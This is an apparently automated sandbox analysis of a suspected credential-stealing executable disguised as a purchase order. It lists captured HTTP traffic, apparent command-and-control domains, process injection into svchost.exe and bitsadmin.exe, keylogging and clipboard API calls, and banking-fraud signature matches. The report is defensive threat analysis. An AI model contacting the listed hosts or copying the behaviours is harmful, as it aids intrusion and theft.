                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Dec 2024 11:52:47 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 04 Dec 2024 11:52:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2BAC4755C4F48762BADCE24E5D9C1C81F61902EB285093D63595120E9400Set-Cookie: _csrf=a6909aa77123718158ffc941b86d9911ae85cba8a08572b458601632067aed1da%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22m0wmc7l3Y6T7AIl_gX1UolXmwUXrCn1-%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 33 48 72 39 71 39 49 4f 65 77 37 79 44 44 31 74 51 59 31 64 59 58 42 2d 43 34 34 71 77 78 35 67 4f 77 42 35 75 4d 64 64 6a 6d 57 78 53 6f 72 47 73 54 6b 58 50 61 73 36 61 56 6f 41 78 44 45 2d 46 79 59 36 32 30 57 76 52 67 31 4d 56 53 48 4b 68 44 4f 5f 53 41 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 04 Dec 2024 11:52:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2B813397DBE986CB5C4E05A354C47B1970B7C9810716FF073327AEFAFE00Set-Cookie: _csrf=9a1ee4f1992cf8075a77323b7965d5c04f5c4b8799b42e6e1adef73ea944e340a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22Psy_7H864pI67CSEPaGBo4Y79fBc4iWj%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 50 77 34 53 67 43 54 52 62 47 72 32 5a 70 50 72 71 30 6e 53 4b 74 45 55 55 41 46 6d 6e 42 38 66 38 49 45 4e 34 75 30 72 34 7a 4a 76 66 57 76 66 45 35 6c 55 58 4d 49 57 32 74 32 63 43 6f 46 76 67 58 55 58 51 77 6d 6f 52 69 6a 4a 35 30 2d 42 32 55 4b 30 57 41 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 04 Dec 2024 11:52:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2BA4C03F7875C9836252DFDE6662D24BE023FEE08804809F4381DB25F600Set-Cookie: _csrf=2600c4fa145ba9ab5add2e1932fb36cd832c7bb4977c3ecb8ef4685c0e838d2ea%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22zhSowqriAwHpcx3LY_9g4XddHQU74CEX%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 7a 6c 30 78 2d 41 68 7a 43 61 2d 43 32 44 49 39 73 74 39 64 4a 71 43 59 6f 58 5a 5f 6a 31 77 53 66 37 73 72 50 44 44 32 58 33 6d 30 4e 57 4b 58 66 77 4a 37 78 73 4f 76 65 6b 33 52 70 32 35 71 2d 63 65 59 45 55 76 58 4f 48 59 33 36 6e 34 4c 42 4c 55 61 49 51 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 04 Dec 2024 11:53:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2B6EF7CE246D813F2A67B6634ECF40471C09CEBEF703DFB544C06E69DC00Set-Cookie: _csrf=747b8697c02316fcf19e7214b88d47110cd215a6080696d3778b8b37088faef7a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22-jrt7cPQ7j7vxss_Mw9RmJa8woAWmtNT%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 35 6f 49 52 34 4d 47 61 73 61 4b 77 30 65 72 71 71 4c 4d 50 6b 37 6a 78 62 6f 53 73 39 64 65 56 48 6d 32 79 6e 35 6c 77 68 34 47 38 48 6f 7a 74 47 55 36 6c 37 32 70 63 4e 33 53 30 62 39 68 41 35 54 38 36 48 5f 35 74 6d 59 6a 46 76 65 64 45 78 47 4d 53 67 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="
                Source: svchost.exe, 00000001.00000003.1851384519.0000000003048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1851083063.000000000301A000.00000004.00000020.00020000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000002.00000003.2206906784.000000000114B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://server/get.asp
                Source: bitsadmin.exe, 00000004.00000002.4115599772.000000000455C000.00000004.10000000.00040000.00000000.sdmp, bitsadmin.exe, 00000004.00000002.4117808293.0000000006540000.00000004.00000800.00020000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000007.00000002.4115123582.00000000039DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.amayavp.xyz/d9ku/?BTPDLZX=oAmOaC9rLcmuYnVqY4jJDWJ7glBqr3
                Source: hLRGQqcplWvpUw.exe, 00000007.00000002.4117111147.0000000005445000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yvcp3.info
                Source: hLRGQqcplWvpUw.exe, 00000007.00000002.4117111147.0000000005445000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yvcp3.info/x20l/
                Source: bitsadmin.exe, 00000004.00000002.4118254849.0000000007FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: bitsadmin.exe, 00000004.00000002.4115599772.00000000040A6000.00000004.10000000.00040000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000007.00000002.4115123582.0000000003526000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn-bj.trafficmanager.net/?h=
                Source: bitsadmin.exe, 00000004.00000002.4118254849.0000000007FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: bitsadmin.exe, 00000004.00000002.4118254849.0000000007FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: bitsadmin.exe, 00000004.00000002.4118254849.0000000007FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: bitsadmin.exe, 00000004.00000002.4118254849.0000000007FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: bitsadmin.exe, 00000004.00000002.4118254849.0000000007FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: bitsadmin.exe, 00000004.00000002.4118254849.0000000007FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: bitsadmin.exe, 00000004.00000002.4113859069.0000000002EF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: bitsadmin.exe, 00000004.00000002.4113859069.0000000002EF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: bitsadmin.exe, 00000004.00000002.4113859069.0000000002EF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: bitsadmin.exe, 00000004.00000002.4113859069.0000000002EF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: bitsadmin.exe, 00000004.00000002.4113859069.0000000002EF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: bitsadmin.exe, 00000004.00000002.4113859069.0000000002EF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: bitsadmin.exe, 00000004.00000003.2065272549.0000000007FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: bitsadmin.exe, 00000004.00000002.4118254849.0000000007FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: bitsadmin.exe, 00000004.00000002.4115599772.0000000004EC8000.00000004.10000000.00040000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000007.00000002.4115123582.0000000004348000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hostgator.com.br
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C84164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00C84164
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C84164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00C84164
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C83F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00C83F66
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C7001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00C7001C
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C9CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00C9CABC

                E-Banking Fraud

                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.4114791942.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4117111147.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1895662906.0000000006D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4113656138.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4114738212.0000000003230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1883944233.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1885773704.0000000004DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4114931150.0000000004180000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: This is a third-party compiled AutoIt script.0_2_00C13B3A
                Source: PO 4110007694.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: PO 4110007694.exe, 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a925af6b-8
                Source: PO 4110007694.exe, 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_530d6616-6
                Source: PO 4110007694.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ace3854b-9
                Source: PO 4110007694.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_e198103f-0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042CA93 NtClose,1_2_0042CA93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672B60 NtClose,LdrInitializeThunk,1_2_03672B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03672DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036735C0 NtCreateMutant,LdrInitializeThunk,1_2_036735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03674340 NtSetContextThread,1_2_03674340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03674650 NtSuspendThread,1_2_03674650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BE0 NtQueryValueKey,1_2_03672BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BF0 NtAllocateVirtualMemory,1_2_03672BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BA0 NtEnumerateValueKey,1_2_03672BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672B80 NtQueryInformationFile,1_2_03672B80
